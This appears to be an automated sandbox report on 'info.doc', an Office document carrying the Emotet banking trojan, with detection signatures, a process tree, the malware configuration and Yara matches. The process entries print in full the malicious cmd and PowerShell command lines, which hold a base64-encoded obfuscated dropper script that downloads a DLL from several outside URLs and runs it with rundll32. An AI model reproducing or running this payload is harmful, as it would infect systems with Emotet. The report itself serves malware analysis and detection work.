Play interactive tour

Edit tour

Analysis Report info.doc

Overview

General Information

Sample Name:	info.doc
Analysis ID:	337044
MD5:	407e5e05f725d0443a0a6d0d3db22e1f
SHA1:	db34ce7024b5320991b464fa08cfb1d7d9a70d75
SHA256:	174649f1b3e64a89faba9684bd2a160f7785b56449193c9dc412e2ac9672b1ca
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

System process connects to network (likely due to code injection or exploit)

Yara detected Emotet

Creates processes via WMI

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Document contains an embedded VBA with many randomly named variables

Encrypted powershell cmdline option found

Hides that the sample has been downloaded from the Internet (zone.identifier)

Obfuscated command line found

Potential dropper URLs found in powershell memory

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Suspicious Encoded PowerShell Command Line

Suspicious powershell command line found

Very long command line found

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 1340 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

cmd.exe (PID: 2384 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwAoACcAQABdACcAKwAnAGIAJwApACsAJwAyACcAKwAnAFsAcwAnACsAKAAnADoALwAnACsAJwAvAGoAbwBoAG4AJwApACsAJwBsAG8AJwArACcAdgAnACsAKAAnAGUAcwAnACsAJwBrAGkAJwApACsAJwBtACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGEALwAnACsAJwBUACcAKQArACgAJwBmACcAKwAnAGYALwAnACkAKQAuACIAcgBgAGUAcABgAGwAYQBjAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAcABMAGAASQB0ACIAKAAkAFgAMwBfAEEAIAArACAAJABBADgAaAAyAHIAegBiACAAKwAgACQASgA4ADQATgApADsAJABJAF8AXwBSAD0AKAAnAEYAXwAnACsAJwA1AE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHIAaQB0ADMAZABrACAAaQBuACAAJABXAHQAXwA1AHcAawBjACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcALQBPAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABTAHkAUwBUAEUATQAuAE4AZQBUAC4AdwBFAEIAYwBMAEkARQBOAHQAKQAuACIAZABPAFcAYABOAGAATABvAGEAZABGAGkATABFACIAKAAkAE4AcgBpAHQAMwBkAGsALAAgACQAVAB6AG8ANwB0AHcAbAApADsAJABKADIANABVAD0AKAAnAFAAJwArACgAJwAzACcAKwAnADUATQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAHoAbwA3AHQAdwBsACkALgAiAEwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAAMwAwADcANQA1ACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFQAegBvADcAdAB3AGwALAAoACcAQwBvACcAKwAoACcAbgB0AHIAbwBsAF8AJwArACcAUgB1ACcAKQArACgAJwBuAEQATAAnACsAJwBMACcAKQApAC4AIgB0AG8AYABTAFQAUgBpAE4AZwAiACgAKQA7ACQARgA5ADEAWQA9ACgAJwBYACcAKwAoACcAMQAnACsAJwAwAEcAJwApACkAOwBiAHIAZQBhAGsAOwAkAE0AXwAxAFcAPQAoACcASwAnACsAKAAnADkAJwArACcANQBEACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADEAXwBTAD0AKAAoACcAWAAnACsAJwAzADUAJwApACsAJwBLACcAKQA= MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

msg.exe (PID: 1692 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)

powershell.exe (PID: 1628 cmdline: POwersheLL -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwAoACcAQABdACcAKwAnAGIAJwApACsAJwAyACcAKwAnAFsAcwAnACsAKAAnADoALwAnACsAJwAvAGoAbwBoAG4AJwApACsAJwBsAG8AJwArACcAdgAnACsAKAAnAGUAcwAnACsAJwBrAGkAJwApACsAJwBtACcAKwAnAC4AJwArACgAJwBjAG8AbQAvACcAKwAnAGEALwAnACsAJwBUACcAKQArACgAJwBmACcAKwAnAGYALwAnACkAKQAuACIAcgBgAGUAcABgAGwAYQBjAEUAIgAoACgAKAAnAF0AYgAnACsAJwAyACcAKQArACcAWwBzACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAcwBkACcALAAnAHMAdwAnACkALAAoACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAHMAcABMAGAASQB0ACIAKAAkAFgAMwBfAEEAIAArACAAJABBADgAaAAyAHIAegBiACAAKwAgACQASgA4ADQATgApADsAJABJAF8AXwBSAD0AKAAnAEYAXwAnACsAJwA1AE0AJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABOAHIAaQB0ADMAZABrACAAaQBuACAAJABXAHQAXwA1AHcAawBjACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcALQBPAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABTAHkAUwBUAEUATQAuAE4AZQBUAC4AdwBFAEIAYwBMAEkARQBOAHQAKQAuACIAZABPAFcAYABOAGAATABvAGEAZABGAGkATABFACIAKAAkAE4AcgBpAHQAMwBkAGsALAAgACQAVAB6AG8ANwB0AHcAbAApADsAJABKADIANABVAD0AKAAnAFAAJwArACgAJwAzACcAKwAnADUATQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlAG0AJwApACAAJABUAHoAbwA3AHQAdwBsACkALgAiAEwAYABlAG4AZwBUAEgAIgAgAC0AZwBlACAAMwAwADcANQA1ACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAbABsADMAMgAnACkAIAAkAFQAegBvADcAdAB3AGwALAAoACcAQwBvACcAKwAoACcAbgB0AHIAbwBsAF8AJwArACcAUgB1ACcAKQArACgAJwBuAEQATAAnACsAJwBMACcAKQApAC4AIgB0AG8AYABTAFQAUgBpAE4AZwAiACgAKQA7ACQARgA5ADEAWQA9ACgAJwBYACcAKwAoACcAMQAnACsAJwAwAEcAJwApACkAOwBiAHIAZQBhAGsAOwAkAE0AXwAxAFcAPQAoACcASwAnACsAKAAnADkAJwArACcANQBEACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABDADEAXwBTAD0AKAAoACcAWAAnACsAJwAzADUAJwApACsAJwBLACcAKQA= MD5: 852D67A27E454BD389FA7F02A8CBE23F)

rundll32.exe (PID: 2468 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2296 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Xts_nmf\P4188qk\U95D.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2848 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sfwveevpdqixuom\bsjtfkdrderxek.bnn',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2684 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vobicwh\otzfel.hzn',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2880 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uxgydceommtwiki\qzhrxsieatmrnj.xlc',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2884 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bdzitbg\obtbak.jsi',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2444 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xewbyzlpihpnskgh\wwdzuofqhkcpmfa.gyu',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2408 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qakdocqxk\cjwfvfif.ylv',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2780 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hutifyziasbygiy\qhmiqrfpmiryum.ywy',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Tsbimf\rxvqt.dyw',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zqkhe\wtjq.kha',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 2720 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rimdqgeexmnm\pcwmnbkufem.jtj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 852 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xoteg\llch.amx',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 600 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vaxphioewmusne\ukdxjhhssdymm.ubj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

rundll32.exe (PID: 1192 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Widpnptibmnvlc\vizfdwjpjtiec.yqj',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)

cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2095952053.00000000001B1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2107348022.0000000000691000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2087899639.00000000001E0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000C.00000002.2095884659.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2089448478.0000000000160000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2086257374.0000000001C56000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x890:$s1: POwersheLL
00000009.00000002.2091105299.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000008.00000002.2089495530.0000000000181000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000012.00000002.2107314831.0000000000670000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000010.00000002.2101676455.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000D.00000002.2097335111.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2103601856.0000000000130000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2095271889.00000000002C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000005.00000002.2086147176.0000000000336000.00000004.00000001.sdmp	PowerShell_Case_Anomaly	Detects obfuscated PowerShell hacktools	Florian Roth	0x1f10:$s1: POwersheLL
00000013.00000002.2109173183.0000000000240000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000F.00000002.2100125404.0000000000210000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000014.00000002.2337393859.0000000000301000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000009.00000002.2091148217.00000000001C1000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000013.00000002.2109198053.0000000000261000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2099058113.0000000000391000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000B.00000002.2095249206.00000000002A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000014.00000002.2337362227.0000000000190000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000E.00000002.2098697585.0000000000170000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
0000000A.00000002.2092936438.00000000001A0000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
